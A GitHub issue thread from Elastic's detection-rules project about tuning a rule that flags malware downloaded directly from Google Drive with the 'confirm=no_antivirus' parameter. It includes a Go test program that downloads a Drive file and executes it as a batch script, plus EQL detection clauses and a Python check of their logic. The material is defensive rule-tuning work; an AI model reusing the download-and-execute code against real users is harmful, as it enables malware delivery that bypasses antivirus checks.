[Rule Tuning] Google Drive Direct Download Detection #3391

Closed
1 of 3 tasks
terrancedejesus opened this issue Jan 16, 2024 · 6 comments
Labels
Domain: Endpoint Domain: Network Rule: Tuning tweaking or tuning an existing rule

terrancedejesus commented Jan 16, 2024

Link to rule

https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_google_drive_malicious_file_download.toml

Description

This rule has some performance and false-positive considerations that should be addressed. The maxspan is small; however, the use of wildcards and OR logic may be too broad and cause performance issues when the first sequence query is collecting events.

@terrancedejesus terrancedejesus added the Rule: Tuning tweaking or tuning an existing rule label Jan 16, 2024
@terrancedejesus terrancedejesus self-assigned this Jan 16, 2024
@terrancedejesus (Contributor, Author)
Update 01-23-2024

After some initial triage, it appears that direct download links to Google Drive with the parameter confirm=no_antivirus may no longer be viable. Although the request is submitted, response code 303 is returned along with a redirection to a manual download page. Before, it would download the malware directly without the redirection.

While this is the case, the threat of leveraging Google Drive for malware distribution is still prevalent; however, further research and emulation will need to be conducted to properly tune this rule.

Regarding performance, the rule can also be adjusted - specifically with the initial sequence and wildcard usage. Since we have no visibility into the URL requested during the TLS connection, we are unable to write logic on URL parameters. As a result, we must rely on a collection of events with DNS traffic, process and file based events.

Go code to download directly from Google Drive and execute a batch script, used for testing:

package main

import (
    "flag"
    "fmt"
    "io"
    "net/http"
    "os"
    "os/exec"
)

func main() {
    // Define a command-line flag
    fileID := flag.String("id", "", "Google Drive file ID")
    flag.Parse()

    // Check if the file ID is provided
    if *fileID == "" {
        fmt.Println("Please provide a Google Drive file ID using -id flag.")
        os.Exit(1)
    }

    filename := "downloaded_script.bat"
    fileURL := fmt.Sprintf("https://drive.google.com/uc?export=download&id=%s&confirm=no_antivirus", *fileID)
    err := downloadFile(filename, fileURL)
    if err != nil {
        panic(err)
    }
    fmt.Println("File downloaded successfully")

    // Execute the file
    err = executeBatchFile(filename)
    if err != nil {
        panic(err)
    }
    fmt.Println("Batch file executed successfully")
}

// downloadFile will download a url to a local file.
func downloadFile(filepath string, url string) error {
    // Get the data
    resp, err := http.Get(url)
    if err != nil {
        return err
    }
    defer resp.Body.Close()

    // Create the file
    out, err := os.Create(filepath)
    if err != nil {
        return err
    }
    defer out.Close()

    // Write the body to file
    _, err = io.Copy(out, resp.Body)
    return err
}

// executeBatchFile executes a .bat file.
func executeBatchFile(filepath string) error {
    cmd := exec.Command("cmd", "/C", filepath)
    cmd.Stdout = os.Stdout
    cmd.Stderr = os.Stderr
    return cmd.Run()
}

@rheimsothdecoit

Be aware that this OR after the first block nearly always makes the following parts useless, e.g. in our environment event.action is always "load".

Please check whether "and" instead of the "or" would be correct.

/* Look for processes started or libraries loaded from untrusted or unsigned Windows, Linux or macOS binaries */
(event.action in ("exec", "fork", "start", "load")) or

/* Look for Google Drive download URL with AV flag skipping */
(process.args : "*drive.google.com*" and process.args : "*export=download*" and process.args : "*confirm=no_antivirus*")

...

Also, the benign process list does not contain the Firefox and Chrome binaries on Linux machines, only the Windows ones.

...
 and not process.executable:
        ("/bin/terraform",
        "*/bin/dockerd",
        "/usr/local/bin/docker-init",
        "*/bin/go",
        "?:\\Program Files*\\Mozilla Firefox\\firefox.exe",
        "?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe")
...
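Added example, not part of the issue or of Elastic's rule: the two predicate forms this comment contrasts, approximated in Python with fnmatch standing in for EQL's case-insensitive `:` wildcard match, run over constructed sample events; it also checks the quoted process.executable exclusion list against a Linux Firefox path (field names follow ECS, the sample events and the file ID are placeholders).

```python
from fnmatch import fnmatchcase

ACTIONS = ("exec", "fork", "start", "load")

# Benign-executable exclusion list exactly as quoted in the comment above.
BENIGN_EXECUTABLES = (
    "/bin/terraform", "*/bin/dockerd", "/usr/local/bin/docker-init", "*/bin/go",
    "?:\\Program Files*\\Mozilla Firefox\\firefox.exe",
    "?:\\Program Files*\\Google\\Chrome\\Application\\chrome.exe",
)

def eql_like(value, pattern):
    """Approximates EQL ':' (case-insensitive wildcard) on a string or array field."""
    values = value if isinstance(value, list) else [value]
    return any(fnmatchcase(v.lower(), pattern.lower()) for v in values)

def drive_download_args(event):
    args = event.get("process.args", [])
    return (eql_like(args, "*drive.google.com*")
            and eql_like(args, "*export=download*")
            and eql_like(args, "*confirm=no_antivirus*"))

def matches_with_or(event):
    # The quoted form: any exec/fork/start/load event satisfies the whole clause.
    return event.get("event.action") in ACTIONS or drive_download_args(event)

def matches_with_and(event):
    # The suggested form: the action AND the Drive download args must both hold.
    return event.get("event.action") in ACTIONS and drive_download_args(event)

def is_excluded(executable):
    """The 'not process.executable: (...)' clause; True means the event is suppressed."""
    return any(eql_like(executable, p) for p in BENIGN_EXECUTABLES)

# Constructed sample events (not real telemetry); the file ID is a placeholder.
EVENTS = [
    {"name": "benign_dll_load", "event.action": "load",
     "process.args": ["C:\\Windows\\System32\\kernel32.dll"]},
    {"name": "drive_direct_download", "event.action": "start",
     "process.args": ["curl.exe", "https://drive.google.com/uc?export=download"
                      "&id=FILE_ID_PLACEHOLDER&confirm=no_antivirus"]},
    {"name": "unrelated_download", "event.action": "start",
     "process.args": ["curl.exe", "https://example.com/file.bin"]},
]

def evaluate(events=EVENTS):
    """Returns {name: (matches_with_or, matches_with_and)} for each event."""
    return {e["name"]: (matches_with_or(e), matches_with_and(e)) for e in events}
```

With the OR form every ordinary library load fires; with AND only the Drive download command does, and a Linux Firefox binary is not covered by the Windows-only exclusion patterns.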

@terrancedejesus (Contributor, Author)

Update 02-01-2024

After some research and discussion, we have expanded the scope of this rule tuning issue. We will be decoupling some of the activity the original rule attempted to identify, as well as creating new rules to detect similar activity.

Details can be found in the tuning pull request: #3411 (comment)

A tasklist has been added at the top of this tuning to add additional scope.

@terrancedejesus terrancedejesus changed the title [Rule Tuning] Malicious File Downloaded from Google Drive [Rule Tuning] Google Drive Direct Download Detection Feb 1, 2024
botelastic bot commented Apr 1, 2024

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

@botelastic botelastic bot added the stale 60 days of inactivity label Apr 1, 2024
@w0rk3r w0rk3r removed the stale 60 days of inactivity label Apr 1, 2024
@terrancedejesus (Contributor, Author)

Closing this issue. Original tuning has been completed. Further investigation revealed that HTTPS and TLS are used for making connections to Google Drive by default and thus we do not have proper visibility via existing integrations.
